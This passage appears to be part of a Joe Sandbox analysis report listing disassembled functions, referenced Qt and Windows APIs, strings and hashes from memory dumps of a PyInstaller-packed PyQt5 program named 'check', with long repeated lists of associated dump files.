                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawPainter@@Pixmap@Pixmap@@Tiled$F@@@PointRect$Point@@@Rect@@
                                                                                                                                                                                                                                          • String ID: BJ9J9|J1$BJ9J9|J9$BiiiiJ9|ii$QPainter$drawTiledPixmap$drawTiledPixmap(self, rectangle: QRectF, pixmap: QPixmap, pos: Union[QPointF, QPoint] = QPointF())drawTiledPixmap(self, rectangle: QRect, pixmap: QPixmap, pos: QPoint = QPoint())drawTiledPixmap(self, x: int, y: int, width: int, height: int, pixmap: QPixmap,
                                                                                                                                                                                                                                          • API String ID: 2619674422-3544056308
                                                                                                                                                                                                                                          • Opcode ID: fbf0e85d4ae795fe20a8b35071a35a2b3043c1a19245c657ed1321e746889b2d
                                                                                                                                                                                                                                          • Instruction ID: 41c898b7d394bec2bf09039b4b6ffba972a7ee0982e930e193c82002fb1e64c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf0e85d4ae795fe20a8b35071a35a2b3043c1a19245c657ed1321e746889b2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E91C637A19F45DAE711CF65E48019DB3B8FB48B88B504236EA8E53B28EF38E155C744
                                                                                                                                                                                                                                          Function 00007FF89D939EF0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 316COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?map@Transform@@V2@@$Concurrency::cancel_current_taskDeallocLineLine@@PointPoint@@malloc
                                                                                                                                                                                                                                          • String ID: J1J9$J9J9
                                                                                                                                                                                                                                          • API String ID: 195627164-2568843907
                                                                                                                                                                                                                                          • Opcode ID: 36a2918275401c536ff13508c2a07f66cab95c845ef2f1bfb27fb68f89e8c33c
                                                                                                                                                                                                                                          • Instruction ID: 8676d50aa07899011077bd5d864f3695998b3b2e5cd8553e806debfce2a96bda
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a2918275401c536ff13508c2a07f66cab95c845ef2f1bfb27fb68f89e8c33c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14F18C33A09B4989D7218F36E8841A973A1FF59BC4F159332EA8E67764EF29F0509704
                                                                                                                                                                                                                                          Function 00007FF89D9A40A0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 132COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Rect$?drawArc@Painter@@$Rect@@@
                                                                                                                                                                                                                                          • String ID: BJ9ii$Biiiiii$QPainter$drawArc$drawArc(self, rect: QRectF, a: int, alen: int)drawArc(self, r: QRect, a: int, alen: int)drawArc(self, x: int, y: int, w: int, h: int, a: int, alen: int)
                                                                                                                                                                                                                                          • API String ID: 3371730212-2814619037
                                                                                                                                                                                                                                          • Opcode ID: 5a68282015af09683cd19c479c651493e8e32a9cd16c0ddd8da73b9398c1bc91
                                                                                                                                                                                                                                          • Instruction ID: 8ffa64677a2cbf662044c2dfe84e60cc5110083101efb468c3d1f3c366c36abb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a68282015af09683cd19c479c651493e8e32a9cd16c0ddd8da73b9398c1bc91
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E61E437619F85D9D760CF65E48029973B8FB58B88F504236EA8E17B28EF38E159C704
                                                                                                                                                                                                                                          Function 00007FF89D96FA90 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?cellAt@QTextTable@@QEBA?AVQTextTableCell@@HH@Z.QT5GUI ref: 00007FF89D96FB06
                                                                                                                                                                                                                                          • ?cellAt@QTextTable@@QEBA?AVQTextTableCell@@H@Z.QT5GUI ref: 00007FF89D96FB88
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?cellCell@@TableTable@@$malloc
                                                                                                                                                                                                                                          • String ID: BJ9$Bii$QTextTable$cellAt$cellAt(self, row: int, col: int) -> QTextTableCellcellAt(self, position: int) -> QTextTableCellcellAt(self, c: QTextCursor) -> QTextTableCell
                                                                                                                                                                                                                                          • API String ID: 682858449-3660252147
                                                                                                                                                                                                                                          • Opcode ID: dc38312ec6832a647a7fdd14ccacb32c3baeefa2edb8dd095ea4964618cdc72f
                                                                                                                                                                                                                                          • Instruction ID: b9ff790b7927e9c99c7d180a80d272cfe3bc26d2dfd682124bab1121c16284cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc38312ec6832a647a7fdd14ccacb32c3baeefa2edb8dd095ea4964618cdc72f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C515A77A09A46C6EB608F15E8452A973A5FB88FC0F904136EA8E47724EF3CE555CB04
                                                                                                                                                                                                                                          Function 00007FF7124FEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                          • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                          • Instruction ID: 22a129cf519732ddf5a8ed39094e2b8ee0690ab671d8c3efe59e8b3e2d194d95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DD19432A08B4186EB30EF29D4403ADB7A0FB84BA9F500135DE8D57B95DF78E869C710
                                                                                                                                                                                                                                          Function 00007FF71250ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF71250F0AA,?,?,0000029FD75F69C8,00007FF71250AD53,?,?,?,00007FF71250AC4A,?,?,?,00007FF712505F3E), ref: 00007FF71250EE8C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF71250F0AA,?,?,0000029FD75F69C8,00007FF71250AD53,?,?,?,00007FF71250AC4A,?,?,?,00007FF712505F3E), ref: 00007FF71250EE98
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                          • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                          • Instruction ID: 6f80c86179e1a5dbb922743ee40829bb654f5e7b51f253034b71fd84d99f8ef8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6411322B09E0281EB15EF16AC80575B291BF48BB0FD84179DD1D47794FEBCE80DD228
                                                                                                                                                                                                                                          Function 00007FF7124F2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2C9E
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2D63
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7124F2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                          • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                          • Instruction ID: aa1720b3ce7108d4d046d7992199bab046b5a6a8dd2a8a6ffa8cf6fcd9b7e75b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E531C732708E4142E720BB25A8546AAA691BFC8BA8F810136EF4D53759EE7CD91AC310
                                                                                                                                                                                                                                          Function 00007FF89D95BFE0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?insertText@QTextCursor@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FF89D95C05E
                                                                                                                                                                                                                                          • ?insertText@QTextCursor@@QEAAXAEBVQString@@AEBVQTextCharFormat@@@Z.QT5GUI ref: 00007FF89D95C120
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?insertCursor@@Text@$CharFormat@@@String@@String@@@
                                                                                                                                                                                                                                          • String ID: BJ1$BJ1J9$QTextCursor$insertText$insertText(self, text: Optional[str])insertText(self, text: Optional[str], format: QTextCharFormat)
                                                                                                                                                                                                                                          • API String ID: 401343420-1360351603
                                                                                                                                                                                                                                          • Opcode ID: 256c5410ab87a76d6a03d35366d94de60c9fb46bf738a0879ba45ce3ec90a4cc
                                                                                                                                                                                                                                          • Instruction ID: 6fabecaf2e6d655f832af0ebee80ae8094b7f6c5387f7a7c414346a09be3e894
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 256c5410ab87a76d6a03d35366d94de60c9fb46bf738a0879ba45ce3ec90a4cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E41C577A08B4589EB608F61E8843A933B4F748BD8F454136DA8E43728EF38E159C744
                                                                                                                                                                                                                                          Function 00007FF89D941A20 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?translated@QPolygon@@QEBA?AV1@HH@Z.QT5GUI ref: 00007FF89D941A96
                                                                                                                                                                                                                                          • ?translated@QPolygon@@QEBA?AV1@AEBVQPoint@@@Z.QT5GUI ref: 00007FF89D941B24
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
